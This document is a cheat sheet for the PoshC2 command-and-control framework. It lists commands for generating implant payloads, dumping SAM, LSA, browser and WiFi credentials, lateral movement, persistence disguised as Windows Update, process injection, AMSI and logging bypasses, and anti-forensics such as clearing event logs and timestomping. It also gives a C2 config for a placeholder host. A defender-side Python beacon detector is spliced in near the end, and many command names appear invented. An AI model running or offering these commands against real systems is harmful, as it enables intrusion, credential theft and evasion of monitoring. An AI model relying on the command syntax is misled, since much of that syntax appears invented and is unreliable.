PoshC2 Framework Cheat Sheet

Overview

PoshC2 is a proxy-aware C2 framework developed by Nettitude for red teaming and post-exploitation activities. It provides PowerShell exploitation capabilities, lateral movement tooling and extensive proxy support for operating in restricted network environments.

Warning: This tool is intended only for authorized penetration tests and red team exercises. Make sure you have proper authorization before using it in any environment.

Installation

Ubuntu/Debian Installation

```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential

# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2

# Install PoshC2
sudo ./Install.sh

# Alternative pip installation
pip3 install poshc2
```

Docker Installation

```bash
# Pull PoshC2 Docker image
docker pull nettitude/poshc2

# Run PoshC2 in Docker
docker run -it -p 443:443 -p 80:80 nettitude/poshc2

# Run with persistent data
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2
```

Manual Installation

```bash
# Install Python dependencies
pip3 install -r requirements.txt

# Install additional tools
sudo apt install mingw-w64 mono-mcs

# Set up database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"
```

Basic Usage

Starting the PoshC2 Server

```bash
# Start PoshC2 server
poshc2 --start

# Start with custom configuration
poshc2 --start --config /path/to/config.yml

# Start with specific project
poshc2 --start --project MyProject
```

Creating a New Project

```bash
# Create new project
poshc2 --new-project ProjectName

# List projects
poshc2 --list-projects

# Switch project
poshc2 --project ProjectName
```

Command Reference

Server Management

| Command | Description |
| --- | --- |
| help | Display help menu |
| show-urls | Show payload URLs |
| list-implants | List active implants |
| implant-handler | Enter implant handler |
| quit | Exit PoshC2 |

Implant Handler Commands

| Command | Description |
| --- | --- |
| help | Show implant commands |
| back | Return to main menu |
| list-implants | List all implants |
| use <implant-id> | Select implant |
| kill <implant-id> | Kill implant |
| remove-implant <implant-id> | Remove implant from database |

Implant Interaction

| Command | Description |
| --- | --- |
| help | Show available commands |
| shell <command> | Execute shell command |
| upload-file <local> <remote> | Upload file |
| download-file <remote> | Download file |
| screenshot | Take screenshot |
| get-system | Attempt privilege escalation |

Payload Generation

PowerShell Payloads

```bash
# Generate PowerShell payload
poshc2 --gen-payload powershell

# Generate encoded PowerShell
poshc2 --gen-payload powershell --encoded

# Generate PowerShell with proxy
poshc2 --gen-payload powershell --proxy http://proxy:8080
```

Executable Payloads

```bash
# Generate Windows executable
poshc2 --gen-payload exe

# Generate DLL payload
poshc2 --gen-payload dll

# Generate service executable
poshc2 --gen-payload service-exe
```

Web Payloads

```bash
# Generate HTA payload
poshc2 --gen-payload hta

# Generate macro payload
poshc2 --gen-payload macro

# Generate JavaScript payload
poshc2 --gen-payload js
```

Linux Payloads

```bash
# Generate Linux Python payload
poshc2 --gen-payload py

# Generate Linux shell payload
poshc2 --gen-payload sh

# Generate Linux ELF payload
poshc2 --gen-payload elf
```

Proxy Configuration

HTTP Proxy Support

```bash
# Configure HTTP proxy
set-proxy http://proxy.company.com:8080

# Configure authenticated proxy
set-proxy http://username:password@proxy.company.com:8080

# Configure SOCKS proxy
set-proxy socks5://proxy.company.com:1080
```

Proxy Chain Configuration

```bash
# Multiple proxy configuration
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080

# Proxy with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128
```

Proxy Testing

```bash
# Test proxy connectivity
test-proxy http://proxy.company.com:8080

# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080
```

Post-Exploitation Commands

System Information

```bash
# Get system information
get-computerinfo

# Get current user
whoami

# Get domain information
get-domain

# Get local users
get-localuser

# Get local groups
get-localgroup
```

Credential Harvesting

```bash
# Dump SAM database
hashdump

# Dump LSA secrets
lsa-secrets

# Dump cached credentials
cachedump

# Extract browser passwords
get-browserdata

# Dump WiFi passwords
get-wifipasswords
```

Active Directory Enumeration

```bash
# Get domain controllers
get-domaincontroller

# Get domain users
get-domainuser

# Get domain groups
get-domaingroup

# Get domain computers
get-domaincomputer

# Get domain admins
get-domainadmin
```

Lateral Movement

```bash
# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"

# PSExec execution
invoke-psexec -target 192.168.1.10 -command "whoami"

# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"

# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"
```

Persistence

```bash
# Registry persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"

# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"

# WMI persistence
new-persistence -method wmi -eventname "ProcessStart"
```

Advanced Features

PowerShell Modules

```bash
# Load PowerShell module
loadmodule /path/to/module.ps1

# Import PowerView
loadmodule PowerView

# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz

# Import PowerUp
loadmodule PowerUp
```

.NET Assembly Execution

```bash
# Execute .NET assembly
run-exe /path/to/assembly.exe arguments

# Execute in memory
run-exe-inmemory /path/to/assembly.exe arguments

# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll
```

Process Injection

```bash
# Inject into process
inject-shellcode -processid 1234 -shellcode

# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe

# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll
```

Network Operations

```bash
# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389

# Network discovery
invoke-networkscan -subnet 192.168.1.0/24

# SMB enumeration
invoke-smbenum -target 192.168.1.10

# Share enumeration
invoke-shareenum -target 192.168.1.10
```

Evasion Techniques

AMSI Bypass

```bash
# AMSI bypass
amsi-bypass

# Custom AMSI bypass
amsi-bypass -method custom

# Reflection-based bypass
amsi-bypass -method reflection
```

ETW Bypass

```bash
# ETW bypass
etw-bypass

# Disable ETW logging
disable-etw

# Patch ETW functions
patch-etw
```

PowerShell Logging Bypass

```bash
# Disable PowerShell logging
disable-pslogging

# Bypass script block logging
bypass-scriptblocklogging

# Disable module logging
disable-modulelogging
```

Obfuscation

```bash
# Obfuscate PowerShell command
invoke-obfuscation -command "Get-Process"

# String obfuscation
obfuscate-string "sensitive string"

# Variable obfuscation
obfuscate-variables
```

Pivoting and Tunneling

SOCKS Proxy

```bash
# Start SOCKS proxy
start-socksproxy -port 1080

# Stop SOCKS proxy
stop-socksproxy

# List proxy connections
list-socksproxy
```

Port Forwarding

```bash
# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80

# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22

# Stop port forward
stop-portforward -id 1
```

Beacon Chaining

```bash
# Create beacon chain
new-beacon -parent -child

# List beacon chains
list-beacons

# Remove beacon chain
remove-beacon -id
```

Operational Security

Communication Security

```bash
# Use HTTPS communications
set-comms https

# Custom User-Agent
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set-headers "X-Forwarded-For: 192.168.1.100"

# Domain fronting
set-domainfront cdn.example.com
```

Payload Security

```bash
# Encrypt payloads
encrypt-payload -key "encryption-key"

# Sign payloads
sign-payload -cert /path/to/cert.pfx

# Obfuscate payloads
obfuscate-payload -method xor
```

Anti-Forensics

```bash
# Clear event logs
clear-eventlogs

# Timestomp files
timestomp -file /path/to/file -time "01/01/2020 12:00:00"

# Secure delete
sdelete -file /path/to/file

# Clear tracks
clear-tracks
```

Troubleshooting

Connection Issues

```bash
# Check implant connectivity
test-connectivity

# Verify proxy settings
show-proxy

# Test DNS resolution
test-dns google.com

# Check firewall rules
get-firewallrules
```

Payload Issues

```bash
# Regenerate payloads
regenerate-payloads

# Test payload execution
test-payload /path/to/payload.exe

# Check AV detection
test-av /path/to/payload.exe
```

Performance Issues

```bash
# Adjust beacon interval
set-beacon-time 30

# Optimize jitter
set-jitter 0.2

# Reduce payload size
compress-payload
```

Database Issues

```bash
# Repair database
repair-database

# Backup database
backup-database /path/to/backup

# Restore database
restore-database /path/to/backup
```

Configuration

Server Configuration

```yaml
# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"
```

Proxy Configuration

```yaml
# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http"  # http, socks4, socks5
```
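As an added defender-side example (not part of the original cheat sheet and not PoshC2 code): a small Python detector that runs over constructed proxy log lines and flags client/host pairs whose request timing is regular enough to match the 30-second beacon with 0.2 jitter set with set-beacon-time/set-jitter above, and whose responses are mostly the 404 configured as HTTPResponse. The log format, the thresholds and the hosts and addresses are assumptions made for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log lines (format assumed): <iso-timestamp> <client> <host> <status> "<user-agent>".
# 10.0.0.5 polls c2.example.com about every 30 s (0.2 jitter: 24-36 s) and gets 404s; 10.0.0.9 browses normally.
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
LOG_LINES = [
    f'2024-01-01T12:00:00 10.0.0.5 c2.example.com 404 "{UA}"',
    f'2024-01-01T12:00:00 10.0.0.9 www.example.org 200 "{UA}"',
    f'2024-01-01T12:00:02 10.0.0.9 www.example.org 200 "{UA}"',
    f'2024-01-01T12:00:31 10.0.0.5 c2.example.com 404 "{UA}"',
    f'2024-01-01T12:00:58 10.0.0.5 c2.example.com 404 "{UA}"',
    f'2024-01-01T12:01:33 10.0.0.5 c2.example.com 404 "{UA}"',
    f'2024-01-01T12:02:02 10.0.0.5 c2.example.com 404 "{UA}"',
    f'2024-01-01T12:03:02 10.0.0.9 www.example.org 200 "{UA}"',
    f'2024-01-01T12:03:07 10.0.0.9 www.example.org 200 "{UA}"',
    f'2024-01-01T12:04:07 10.0.0.9 www.example.org 200 "{UA}"',
]
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def parse_lines(lines):
    """Yield (timestamp, client, host, status) for each line matching the assumed format."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts, src, host, status, _ua = m.groups()
            yield datetime.fromisoformat(ts), src, host, status


def find_beacons(lines, min_hits=5, max_cv=0.25, status="404", min_status_ratio=0.8):
    """Flag (client, host) pairs whose request gaps are regular (stdev/mean <= max_cv) and whose
    responses are mostly the configured status. A 30 s beacon with 0.2 jitter gives a CV near 0.1."""
    per_pair = defaultdict(list)
    for ts, src, host, st in parse_lines(lines):
        per_pair[(src, host)].append((ts, st))
    findings = []
    for (src, host), events in per_pair.items():
        if len(events) < min_hits:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean_gap = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap > 0 else float("inf")
        ratio = sum(1 for _, st in events if st == status) / len(events)
        if cv <= max_cv and ratio >= min_status_ratio:
            findings.append({"src": src, "host": host, "hits": len(events),
                             "mean_gap": round(mean_gap, 1), "cv": round(cv, 2)})
    return findings
```

Raising max_cv catches wider jitter settings at the cost of more false positives from polling applications, so pair the timing check with the response-status and header fields the configuration above fixes.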

Resources

---

*This cheat sheet provides a comprehensive reference for using the PoshC2 Framework. Always make sure you have proper authorization before using this tool in any environment.*